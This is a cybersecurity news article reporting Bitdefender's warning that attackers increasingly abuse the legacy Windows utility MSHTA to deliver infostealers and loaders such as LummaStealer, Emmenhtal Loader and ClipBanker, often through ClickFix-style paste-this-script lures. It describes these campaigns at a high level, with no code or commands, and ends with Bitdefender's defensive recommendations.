An ancient Windows utility is giving hackers an almost embarrassingly easy ride once they’re inside a system. It’s called MSHTA, and it is increasingly abused to deliver data-siphoning malware, Bitdefender warns.

MSHTA is a legacy scripting utility from the Internet Explorer era. It was introduced in 1999 to run HTAs – desktop apps whose code consists of web-based scripts, such as HTML, VBScript, or JScript.

Internet Explorer was deprecated, but MSHTA remains on every Windows computer with complete access to files, network, and system, and lacks modern browser sandbox protections. Bitdefender, a cybersecurity firm, says MSHTA is massively abused by hackers.

In recent months, several malicious campaigns have been relying on MSHTA to deliver malware, infostealers, or execute other malicious HTA scripts.

“We noticed an increase in detections of mshta.exe in the execution chain, indicating that it remains a relevant Living-off-the-Land binary even after standalone Internet Explorer was retired,” the report on MSHTA by Bitdefender reads.

ClickFix-style social engineering attacks, where hackers trick users into running a single script, have become one of the most pressing issues causing massive damage, and MSHTA serves hackers as a multitool in such attacks.

“It provides attackers with a built-in, Microsoft-signed utility that can retrieve and execute remote script content during the initial or intermediate stages of an infection chain,” Bitdefender explains.

LummaStealer and Amatera are the two most notorious infostealers – and hackers use HTA-based CountLoader to deliver them. The attackers, luring users with cracked software, host malware on legitimate-looking domain names such as “google-services” or “memory-scanner,” and only a top-level domain, usually .cc, signals that the website is malicious.

Another malicious campaign has been using a multi-stage loader called Emmenhtal Loader, which relies on MSHTA to execute early stages – retrieve and launch a remote HTA payload and unfold subsequent infection chains.

Victims, tricked into copying and pasting a script via phishing messages on Discord or elsewhere as a fake human verification process, end up with commodity malware, including information stealers.

Crypto-currency-stealing malware ClipBanker, which replaces wallet addresses in the victim’s clipboard, also relies on MSHTA for early-stage execution.

MSHTA is also abused in delivery chains associated with advanced and persistent malware, PurpleFox.

“Our telemetry shows multiple smaller clusters of PowerShell executions via MSHTA, where MSHTA creates a wscript shell that runs the PowerShell process to execute the loader responsible for downloading the next stage,” Bitdefender said.

Not all MSHTA uses are malicious – older software packages might still use it. However, Bitdefender treats it as an additional attack surface and recommends moving away from MSHTA in administrative workflows wherever possible.

“There is currently no public indication that this utility will also be removed from future versions of Windows. As long as it remains available by default, MSHTA remains relevant both as a residual administrative tool and as part of the exposed attack surface.”

However, simply eliminating MSHTA wouldn’t prevent cyberattacks that rely on user interaction, such as persuading victims to download software or media from untrusted websites, promising free content, or running copy-pasted scripts.

“MSHTA-based attacks usually do not rely on a single malicious file, but on a chain of script execution, command-line abuse, in-memory stages, and follow-on payload delivery,” Bitdefender said.

“That is why protection needs to cover multiple points in the attack chain, from attack surface reduction to pre-execution detection and runtime behavioral blocking.”

---

Unlock more exclusive Cybernews content on YouTube.